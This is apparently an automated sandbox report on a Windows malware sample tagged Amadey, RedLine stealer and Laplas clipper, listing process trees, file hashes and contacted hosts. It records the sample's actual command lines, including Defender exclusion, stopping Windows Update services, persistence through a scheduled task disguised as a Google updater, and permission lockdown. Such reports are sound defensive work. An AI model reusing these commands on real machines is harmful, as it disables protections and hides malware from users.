Malware Analysis Report

2024-10-19 01:10

Sample ID 230801-3r92fsbg67
Target 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
Tags
amadey laplas redline clipper evasion infostealer persistence stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847

Threat Level: Known bad

The file 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe was found to be: Known bad.

Malicious Activity Summary

amadey laplas redline clipper evasion infostealer persistence stealer themida trojan

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Laplas Clipper

RedLine payload

RedLine

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Loads dropped DLL

Themida packer

Executes dropped EXE

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

GoLang User-Agent

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-01 23:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-01 23:46

Reported

2023-08-01 23:48

Platform

win7-20230712-en

Max time kernel

59s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A

Stops running service(s)

evasion

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 840 set thread context of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1272 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1272 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1272 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1272 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1272 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1272 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1272 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1272 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\SysWOW64\WerFault.exe
PID 840 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\SysWOW64\WerFault.exe
PID 840 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\SysWOW64\WerFault.exe
PID 840 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\SysWOW64\WerFault.exe
PID 1272 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1272 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1272 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1272 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 36

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\system32\taskeng.exe

taskeng.exe {711DAF88-722F-4BCC-8C50-64543DFFCBB9} S-1-5-21-1014134971-2480516131-292343513-1000:NYBYVYTJ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {3A18D9A7-9B42-40AB-AD7D-16FDB4AF1E6A} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

Network

Country Destination Domain Proto
NL 45.15.156.208:80 45.15.156.208 tcp
US 8.8.8.8:53 second.amadgood.com udp
NL 194.180.49.153:80 194.180.49.153 tcp
US 206.189.229.43:80 206.189.229.43 tcp
SG 128.199.192.86:81 tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp

Files

memory/2204-54-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2204-57-0x0000000000F90000-0x0000000001A31000-memory.dmp

memory/2204-56-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2204-59-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2204-61-0x0000000000F90000-0x0000000001A31000-memory.dmp

memory/2204-62-0x0000000077C40000-0x0000000077C41000-memory.dmp

memory/2204-65-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2204-74-0x0000000000F90000-0x0000000001A31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1272-78-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/1272-79-0x0000000000110000-0x0000000000111000-memory.dmp

memory/1272-82-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/1272-84-0x0000000077C40000-0x0000000077C41000-memory.dmp

memory/1272-81-0x0000000000110000-0x0000000000111000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\014134971248

MD5 16895764e0a96a72015b4e5402ee185c
SHA1 8124725156ce79aafe2a008134ed3c966fc8b961
SHA256 f61263093b51ac102308dfc926ac63b529ccffeb260dc20437533c80e2fba46d
SHA512 7dcb5acf20b6c6abb0569b804413ccb89451a04fc74356bdeb33fc89069e7a5b198bcac524943fc2a3576f7eb548be38849208b949181fd1fa62e76c8b60941b

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

memory/1272-116-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/840-117-0x0000000000170000-0x000000000032F000-memory.dmp

memory/2044-118-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2044-119-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2044-123-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2044-125-0x0000000000400000-0x000000000045A000-memory.dmp

